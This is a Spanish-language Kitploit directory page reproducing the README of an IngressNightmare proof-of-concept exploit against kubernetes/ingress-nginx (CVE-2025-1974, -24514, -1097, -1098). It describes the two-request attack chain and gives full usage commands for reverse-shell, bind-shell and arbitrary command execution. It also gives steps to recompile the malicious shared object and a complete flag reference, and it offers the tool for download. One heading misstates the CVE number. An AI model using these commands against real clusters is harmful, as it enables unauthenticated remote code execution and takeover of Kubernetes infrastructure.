Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ingressNightmare-CVE-2025-1974-exps — IngressNightmare POC. primera explotación de ejecución remota no ciega del mundo con métodos de explotación multi-avanzados. permite explotación en disco. CVE-2025-24514 - inyección de auth-url, CVE-2025-1097 - inyección de auth-tls-match-cn, CVE-2025-1098 – inyección de mirror UID -- todos disponibles. | Kitploit
Herramientas/GitHubGitHub/esonhugh/ingressnightmare-cve-2025-1974-exps
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad en la NubeRed TeamingDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

IngressNightmare POC. primera explotación de ejecución remota no ciega del mundo con métodos de explotación multi-avanzados. permite explotación en disco. CVE-2025-24514 - inyección de auth-url, CVE-2025-1097 - inyección de auth-tls-match-cn, CVE-2025-1098 – inyección de mirror UID -- todos disponibles.

GitHub
esonhugh/ingressnightmare-cve-2025-1974-exps

ingressNightmare-CVE-2025-1974-exps

Ver RepositorioSitio web
971410hace 1 añoRevisado por Kitploit
Compartir

Pesadilla de Ingress CVE-2025-1907

Descripción

Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de kubernetes/ingress-nginx. No se requiere autenticación para explotar esta vulnerabilidad. La falla específica existe en el manejo de solicitudes HTTP.

Se desencadena enviando dos solicitudes. Una es una solicitud larga almacenada en búfer al servidor NGINX en el mismo pod, luego nginx la almacenará en caché como un archivo temporal. La segunda solicitud es una solicitud al servidor webhook de validación de admisión, lo que provocará que el webhook de admisión escriba una configuración temporal de nginx que contiene la directiva ssl_engine badso_location;. Luego, el webhook de admisión ejecutará nginx -t para verificar la configuración, lo que desencadenará la ejecución remota de código en el contexto del servidor NGINX.

Explotación

# reverse shell 
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER} 

# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER} 

# blind command execution
./ingressnightmare -m c  -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER} 

# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url 
# same as 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
 
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}

# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid 

## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...

# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload

# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run 
# dump with > /tmp/evil.so

## dry run to lookup raw nginx admission 
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...

## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'

## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}

Grupos de Flags

Las flags del exploit son tan complejas que tuve que agruparlas en varios grupos.

[
     // Set Targets Groups
     {
          option: 	"ingress-webhook-url", "i",
          example:	"https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
          description:	"ingress webhook url"
     },
     {
         option: 	"upload-url", "u",
         example:	"http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
         description: 	"upload url"
    },

    // Set Exploit Method for which CVE
    {
        option:      "is-auth-url", "a",
        example:     "true",
        description: "CVE-2025-24514: using auth-url to attack (default)"
    },
    {
        option:      "is-match-cn", "A",
        example:     "false",
        description: "CVE-2025-1097: using auth-tls-match-cn to attack (not default)"
    },
    {
        option:      "auth-secret-name", "U",
        example:     "kube-system/cilium-ca",
        description: "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca"
    },
    {
        option:      "is-mirror-with-uid", "M",
        example:     "false",
        description: "CVE-2025-1098: using mirror with uid"
    },

    // Set Exploit Mode for reverse shell / bind shell / command
    {
        option:      "mode", "m",
        example:     "r",
        description: "mode reverse-shell(r)/bind-shell(b)/command(c)"
    },
    {
        option:      "reverse-shell-ip", "r",
        example:     "192.168.1.100",
        description: "reverse shell ip"
    },
    {
        option:      "reverse-shell-port", "p",
        example:     "4444",
        description: "reverse shell port"
    },
    {
        option:      "bind-shell-port", "b",
        example:     "4444",
        description: "bind shell port"
    },
    {
        option:      "command", "c",
        example:     "id",
        description: "command"
    },

    // Debug modes
    {
        option:      "verbose", "v",
        example:     "-vv",
        description: "verbose output (debug is -v ; trace is -vv)"
    },
    {
        option:      "dry-run", "d",
        example:     "true",
        description: "dry run and dump payload"
    },

    // test Only Upload Thread / Only Admission Thread modes
    {
        option:      "only-admission", "o",
        example:     "true",
        description: "only admission"
    },
    {
        option:      "only-admission-file", "f",
        example:     "/path/to/file",
        description: "only admission file"
    },
    {
        option:      "only-upload", "O",
        example:     "true",
        description: "only upload"
    },

    // Set guessed PID and FD ranges
    {
        option:      "pid-range-start", "S",
        example:     "5",
        description: "pid range start"
    },
    {
        option:      "pid-range-end", "E",
        example:     "40",
        description: "distance to pid range end"
    },
    {
        option:      "fd-range-start", "s",
        example:     "3",
        description: "fd range start"
    },
    {
        option:      "fd-range-end", "e",
        example:     "26",
        description: "distance fd range end"
    },

    // Advanced Payload: custom so file or json template
    {
        option:      "so", "",
        example:     "/path/to/custom.so",
        description: "custom so file exploit, if u get Exec format error, please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code"
    },
    {
        option:      "validate-json-template", "t",
        example:     "template.json",
        description: "validate json template, using foobar as placeholder to filepath"
    }
]

https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b

Teoría

Descargar herramienta